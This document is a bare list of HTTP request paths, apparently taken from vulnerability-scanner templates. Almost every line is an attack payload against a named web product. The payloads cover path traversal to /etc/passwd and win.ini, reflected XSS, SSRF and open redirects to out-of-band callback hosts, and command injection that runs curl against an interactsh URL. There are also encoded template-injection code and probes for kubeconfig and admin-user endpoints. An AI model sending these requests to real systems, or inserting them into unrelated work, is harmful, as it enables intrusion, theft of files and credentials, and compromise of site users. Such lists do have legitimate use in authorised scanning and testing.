/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live
/fp-content/
/flatpress/fp-content/
/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>
/admin/suppliers/view_details.php?id=1
/api/v1/clusters/kubeconfig/k8s
/?url=<img/src=
/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0
/modules/jmsthemelayout/config.xml
/modules/jmsmegamenu/config.xml
/modules/jmspagebuilder/config.xml
/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
/login
/?q=./gibbon.sql
/mifs/aad/api/v2/admins/users
/mifs/asfV3/api/v2/admins/users
/v1/folder?path=%2F
/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/
/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png
/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf
/wp-content/plugins/media-library-assistant/readme.txt
/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg
/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php
/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd
/config/list
/images//////////////////../../../../../../../../etc/passwd
/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>
/%255c%255c{{interactsh-url}}%255cC$%255cbb
/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime
/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
/v1/avatars/favicon?url=http://{{interactsh-url}}
/_admin/imgdownload.php?filename=imgdownload.php
/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini
/DataLogView.php?eventFileSelected=/etc/passwd
//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd
/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php
/wp-json/igd/v1/get-users-data
/assets/built%2F..%2F..%2F/package.json
/assets/built%2F..%2F..%2F%E0%A4%A/package.json
/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd
/public/ticket/ajax/ajax.php?action=getContacts&email=%
/static/..%5c..%5c..%5c..%5cetc/passwd
/download/{{repeat(
/api/v1/slack/image/slack-image{{repeat(
/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view
/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki
/.cpr/%2Fetc%2Fpasswd
/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash
/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=
/api/sys/set_passwd
/api/v1/terminal/sessions/
/lang/log/httpd.log
/api/sys/login
/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh
/modules/simpleimportproduct/send.php?phpinfo=1
/modules/updateproducts/send.php?phpinfo=1
/api/logout?redirect_to=http://oast.pro/
/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test
/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft
/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-content/uploads/ao_ccss/queuelog.html
/blog/wp-content/uploads/ao_ccss/queuelog.html
/wp-json/download-monitor/v1/user_data
/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E
/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E
/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me
/wp-content/plugins/all-in-one-seo-pack/readme.txt
/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>
/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg
/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/api/index.php/v1/config/application?public=true
/api/v1/config/application?public=true
/login.php
/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small
/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert(
/jsps/genrequest.jsp?routineName=
/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>
/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or
/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5(
/phpmyadmin/
/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1
/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/
/cas/logout?url=https://oast.pro
/index.php?userName=%22%3E%3Cscript%3Econfirm(1)%3C/script%3E
/cpanelwebcall/<img%20src=x%20onerror=
/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}
/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>
/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d
/default.aspx?years=http://oast.pro
/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm
/templates/pages/debug_panel.php?id={{randstr}}
/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)
/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)
/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)
/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)
/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/print.php?nm_member=<script>alert(document.location)</script>
/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27
/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27
/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number=
/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model
/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model
/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity
/users/viewi1omd
/find-a-matchpksyk
/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E
/webmail/?mid={{to_lower(rand_base(4))}}
/webmail/?color=
/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E
/%5coast.pro/%2f%2e%2e
/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0
/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id=
/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1
/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date=
/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>
/classified/%22%3E%3Cimg%20src=a%20onerror=alert(
/search/index?q=
/stores
/user_info
/faqs
/classifieds
/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest
/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1
/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
/search?filtered=1&q=test&filter[price]=100-1331
/search?filter[brandid]=vnxjb
/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest
/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27
/project/switch/1?targetPath=http://oast.pro
/bitrix/components/bitrix/mobileapp.list/ajax.php?items[1][TITLE]=TEXT+INJECTION!+PLEASE+CLICK+HERE!&items[1][DETAIL_LINK]=https://metascan.ru
/bitrix/tools/imagepg.php?img=//metascan.ru/assets/images/logo.svg
/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(
